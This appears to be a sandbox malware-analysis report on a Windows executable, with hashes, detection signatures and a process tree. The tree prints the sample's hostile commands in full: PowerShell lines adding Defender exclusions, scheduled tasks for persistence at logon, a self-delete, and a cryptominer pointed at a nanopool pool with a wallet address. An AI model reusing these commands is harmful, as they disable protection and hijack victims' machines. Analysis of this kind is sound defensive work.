Analysis
-
max time kernel
1s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
22/12/2023, 13:51
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
af9721f9690603beffdb08ccb2b8196a.exe
Resource
win7-20231215-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
af9721f9690603beffdb08ccb2b8196a.exe
Resource
win10v2004-20231215-en
3 signatures
150 seconds
General
-
Target
af9721f9690603beffdb08ccb2b8196a.exe
-
Size
12.9MB
-
MD5
af9721f9690603beffdb08ccb2b8196a
-
SHA1
f2531c0a5d3b3670c369c1b56c3d48ce9983cb46
-
SHA256
05346140fbd935a2bd11cdb627178453624d5c2556ce5d253bd1a35095eaf0c9
-
SHA512
8d7ce747f31e51fd218fe3faa5831a25de14f7df63b541938c8490f85d0f62800e0e2fb6190587bb20b23cbe3c70cd268f1ac133c3e79c3adf2d7da9582345c8
-
SSDEEP
393216:5BIVza8DRgTzJDmTcdUHWM2Yk/6MgkkZqL:LSJRgPJ8cdUvkyMZL
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3024 Ycyjrvvzmiodfe.exe -
Loads dropped DLL 1 IoCs
pid Process 2508 choice.exe -
resource yara_rule behavioral1/memory/2704-106-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/3004-153-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/2704-145-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/3004-157-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/2704-89-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/952-171-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/952-176-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect behavioral1/memory/1656-256-0x0000000140000000-0x0000000141B3D000-memory.dmp vmprotect -
Drops file in Windows directory 13 IoCs
description ioc Process File created C:\Windows\Winteste.bat Ycyjrvvzmiodfe.exe File created C:\Windows\__tmp_rar_sfx_access_check_259395092 Ycyjrvvzmiodfe.exe File created C:\Windows\WNDR.bat Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\WindowsUpdaters.vbs Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\Windows.exe Ycyjrvvzmiodfe.exe File created C:\Windows\WindowsNote.exe Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\WindowsNote.exe Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\WNDR.bat Ycyjrvvzmiodfe.exe File created C:\Windows\winserver.xml Ycyjrvvzmiodfe.exe File created C:\Windows\Windows.exe Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\Winteste.bat Ycyjrvvzmiodfe.exe File created C:\Windows\WindowsUpdaters.vbs Ycyjrvvzmiodfe.exe File opened for modification C:\Windows\winserver.xml Ycyjrvvzmiodfe.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3056 schtasks.exe 1768 schtasks.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2508 wrote to memory of 3024 2508 choice.exe 46 PID 2508 wrote to memory of 3024 2508 choice.exe 46 PID 2508 wrote to memory of 3024 2508 choice.exe 46 PID 2508 wrote to memory of 3024 2508 choice.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"C:\Users\Admin\AppData\Local\Temp\af9721f9690603beffdb08ccb2b8196a.exe"1⤵PID:2508
-
C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"C:\Users\Admin\AppData\Local\Temp\Ycyjrvvzmiodfe.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3024
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 FILE1⤵PID:2680
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:3048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵PID:2128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'2⤵PID:1096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵PID:2368
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 01⤵PID:3004
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 01⤵PID:2704
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 12⤵PID:952
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 22⤵PID:1656
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 32⤵PID:2604
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 42⤵PID:976
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 52⤵PID:1940
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 62⤵PID:1704
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 72⤵PID:2848
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 82⤵PID:2324
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 92⤵PID:3060
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 102⤵PID:1892
-
-
C:\Windows\Windows.exeWindows -a ergo -o stratum+tcp://ergo-us-east1.nanopool.org:11111 -u 9hypbSVjvtzytqG5kNXJvfNu3s72jm2X3RKPGL9zGhL2WpMWGoB.SFVRQGEO --enable-igpu -lhr 0 -RUN -reboot-times 112⤵PID:1248
-
-
C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"1⤵PID:312
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"2⤵PID:1732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /XML C:\Windows\winserver.xml /tn winserver1⤵
- Creates scheduled task(s)
PID:3056
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\WNDR.bat" "1⤵PID:2648
-
C:\Windows\SysWOW64\net.exeNET FILE1⤵PID:2644
-
C:\Windows\WindowsNote.exe"C:\Windows\WindowsNote.exe"1⤵PID:2788
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\WindowsUpdaters.vbs"1⤵PID:2748
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Windows\Winteste.bat" "1⤵PID:2840
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\Vsvesbaopvlqg.exe"1⤵PID:784
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit2⤵PID:2424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"2⤵PID:2512
-
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"2⤵PID:1608
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'1⤵
- Creates scheduled task(s)
PID:1768
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit1⤵PID:2520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵PID:2708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵PID:2672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'2⤵PID:1248
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2508